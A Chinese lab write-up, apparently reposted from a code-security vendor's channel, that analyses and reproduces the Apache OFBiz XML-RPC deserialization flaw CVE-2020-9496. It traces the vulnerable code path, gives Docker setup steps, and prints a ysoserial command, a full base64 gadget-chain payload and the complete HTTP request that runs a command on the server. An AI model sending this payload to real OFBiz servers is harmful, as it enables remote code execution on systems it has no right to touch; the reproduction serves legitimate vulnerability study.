胡鑫宇案:适用 “ 他杀推定 ” 原则 !

胡鑫宇事件新闻发布会:那只高举的手

陈志武:中国政府规模多大?

母子乱伦:和儿子做了,我该怎么办?

去泰国看了一场“成人秀”,画面尴尬到让人窒息.....

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

APACHE OFBIZ XML-RPC 反序列化漏洞 (CVE-2020-9496) 的复现与分析

代码安全实验室 代码卫士 2022-04-06

 聚焦源代码安全,网罗国内外最新资讯!


1.1 状态


完成漏洞挖掘条件分析、漏洞复现。


1.2 简介


相关的重点类和方法:

  • org.apache.xmlrpc.parser.SerializableParser 包含序列化代码;

  • org.apache.ofbiz.webapp.control.RequestHandler负责发送请求至“/webtools/control/xmlrpc”端点;

  • org.apache.ofbiz.webapp.event.XmlRpcEventHandler#execute()方法;

  • org.apache.ofbiz.webapp.event.XmlRpcEventHandler#getRequest()方法的XMLReader类的parse()方法可开展XML解析工作。

  • org.apache.xmlrpc.parser.XmlRpcRequestParser、org.apache.xmlrpc.parser.RecursiveTypeParserImpl、org.apache.xmlrpc.parser.MapParser类可解析XML-RPC请求中的元素。

序列化问题在于org.apache.xmlrpc.parser.SerializableParser#getResult()方法。OFBiz使用的 Apache Commons BeanUtils 库和 Apache ROME库存在漏洞。

XML-RPC是一个远程过程调用(RPC)协议。

版本:APACHE-OFBIZ-16.11.05,jdk1.8。


1.3 漏洞挖掘能力条件


  • 根据调试信息可精准定位入口点。

  • 认为可灵活导入所需jar包。


1.4 利用方法


入口点是 /webtools/control/xmlrpc,因此从framework/webtools/webapp/webtools/WEB-INF/web.xml(如果没有WEB-INF/web.xml文件,tomcat会输出找不到的消息)开始深入分析。



framework/webtools/webapp/webtools/WEB-INF/web.xml

<servlet>

        <description>Main Control   Servlet</description>

          <display-name>ControlServlet</display-name>

          <servlet-name>ControlServlet</servlet-name>

          <servlet-class>org.apache.ofbiz.webapp.control.ControlServlet</servlet-class>   【路由目的地】

          <load-on-startup>1</load-on-startup>

    </servlet>

    <servlet-mapping>

        <servlet-name>ControlServlet</servlet-name>

          <url-pattern>/control/*</url-pattern> 【待路由目录】

    </servlet-mapping>


org.apache.ofbiz.webapp.control.ControlServlet#doPost

-


org.apache.ofbiz.webapp.control.ControlServlet#doGet

long   requestStartTime = System.currentTimeMillis();

        RequestHandler requestHandler =   this.getRequestHandler(); 【a】

        HttpSession session =   request.getSession();

String   errorPage = null;

        try {

            // the ServerHitBin call for the   event is done inside the doRequest method

            requestHandler.doRequest(request,   response, null, userLogin, delegator); 【d】

a

org.apache.ofbiz.webapp.control.RequestHandler#RequestHandler

        this.controllerConfigURL =   ConfigXMLReader.getControllerConfigURL(context); 【b】

this.eventFactory   = new EventFactory(context, this.controllerConfigURL);  【c】

b

org.apache.ofbiz.webapp.control.ConfigXMLReader#getControllerConfigURL

public   static URL getControllerConfigURL(ServletContext context) {

        try {

            return   context.getResource(controllerXmlFileName); 【controllerXmlFileName= /WEB-INF/controller.xml

        } catch (MalformedURLException e) {

            Debug.logError(e, "Error   Finding XML Config File: " + controllerXmlFileName, module);

            return null;

        }

    }


C:\Users\wangze\Downloads\apache-ofbiz-16.11.05new\framework\webtools\webapp\webtools\WEB-INF\controller.xml

<request-map   uri="xmlrpc" track-serverhit="false"   track-visit="false">

        <security   https="false"/>

          <event type="xmlrpc"/> 【应该是对请求事件类型的判断】

        <response name="error"   type="none"/>

        <response name="success"   type="none"/>

    </request-map>

c

org.apache.ofbiz.webapp.event.EventFactory#EventFactory

-

d

org.apache.ofbiz.webapp.control.RequestHandler#doRequest(HttpServletRequest,   HttpServletResponse, String, GenericValue, Delegator)

//   Grab data from request object to process

        String defaultRequestUri =   RequestHandler.getRequestUri(request.getPathInfo()); 【request.getPathInfo()=/xmlrpc】

String   returnString = this.runEvent(request, response, event, null,   "preprocessor");  【返回成功字符串】          

           / Invoke the defined event (unless   login failed)

        if (eventReturn == null &&   requestMap.event != null) {

            if (requestMap.event.type != null   && requestMap.event.path != null && requestMap.event.invoke   != null) {

                try {

                    long eventStartTime =   System.currentTimeMillis();


                    // run the request event

                    eventReturn =   this.runEvent(request, response, requestMap.event【xmlrpc】, requestMap,   "request");


org.apache.ofbiz.webapp.control.RequestHandler#runEvent

EventHandler   eventHandler = eventFactory.getEventHandler(event.type【xmlrpc】);

        String eventReturn = eventHandler.invoke(event,   requestMap, request, response);


org.apache.ofbiz.webapp.event.XmlRpcEventHandler#invoke

try   {

                  this.execute(this.getXmlRpcConfig(request), new   HttpStreamConnection(request, response));【总结,根据controller.xml控制路由调用xmlprc相关方法】


org.apache.ofbiz.webapp.event.XmlRpcEventHandler#execute

try   (InputStream istream = getInputStream(pConfig, pConnection)) {

                XmlRpcRequest request =   getRequest(pConfig, istream);

                result = execute(request);

            } catch (Exception e) {

                Debug.logError(e, module);

                foundError = true;

            }【会请求失败】


org.apache.ofbiz.webapp.event.XmlRpcEventHandler#getRequest

xr.setContentHandler(parser);

        try {

              xr.setFeature("http://apache.org/xml/features/disallow-doctype-decl",   true);

              xr.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd",   false);

              xr.setFeature("http://xml.org/sax/features/external-general-entities",   false);

              xr.setFeature("http://xml.org/sax/features/external-parameter-entities",   false);

            xr.parse(new   InputSource(pStream)); 【可执行脚本】



1.5 docker复现


第一步,下载docker镜像:

docker pull 296645429/cve-2020-9496

第二步,设置局域网及容器ip、启动容器,例子:

(1) 自定义网络

docker network create --subnet=192.168.10.1/24 testnet


(2) 启动docker容器

docker run -p 8088:8088 -p 8081:8081 -it --name testt3 --hostname testt3 --network testnet --ip 10.10.10.100 ubuntuxxx:xxx /bin/bash


第三步,启动OFBIZ服务。在容器中,依次输入命令:

cd ./apache-ofbiz-16.11.05


./gradlew cleanAll loadDefault ofbiz

几分钟后,在宿主机浏览器输入https://localhost:8443/myportal/control/main,如下图说明环境搭建完毕。

                                             

第四步,在宿主机的终端,执行命令:

java -jar ysoserial-master-6ecnsBeanutils1 "touch /tmp/112"|base64 |  tr -d '\n'

输出编码后的指令:

rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABqLK/rq+AAAAMgA5CgADACIHADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9pby9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQAOdG91Y2ggL3RtcC8xMTIIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB15c29zZXJpYWwvUHduZXIxMTcwMDAyNjI0MjI1NwEAH0x5c29zZXJpYWwvUHduZXIxMTcwMDAyNjI0MjI1NzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAl1cQB+ABAAAAHUyv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==

在宿主机中,使用burpsuite抓包并发送此编码内容,完整数据包信息如下。

POST /webtools/control/xmlrpc HTTP/1.1
Host: localhost:8443
Connection: close
Content-Type: application/xml
Content-Length: 4117


<?xml version="1.0"?>
<methodCall>
<methodName>22</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>22</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABqLK/rq+AAAAMgA5CgADACIHADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9pby9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQAOdG91Y2ggL3RtcC8xMTIIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB15c29zZXJpYWwvUHduZXIxMTcwMDAyNjI0MjI1NwEAH0x5c29zZXJpYWwvUHduZXIxMTcwMDAyNjI0MjI1NzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAl1cQB+ABAAAAHUyv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>


发送后,返回正常响应信息,观察容器可知生成112文件,复现成功。


1.6 参考资料


  • https://www.freebuf.com/vuls/250378.html

  • https://www.cnblogs.com/ph4nt0mer/p/13576739.html

  • https://xz.aliyun.com/t/8184#toc-4

  • https://blog.csdn.net/caiqiiqi/article/details/108646579

  • https://github.com/frohoff/ysoserial








推荐阅读
XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现与分析
Apache Commons Collections反序列化漏洞分析与复现
FireEye 红队失窃工具大揭秘之:分析复现 Zoho 任意文件上传漏洞(CVE-2020-8394)



题图:Pixabay License


转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。


奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的

产品线。

    觉得不错,就点个 “在看” 或 "” 吧~

文章有问题?点此查看未经处理的缓存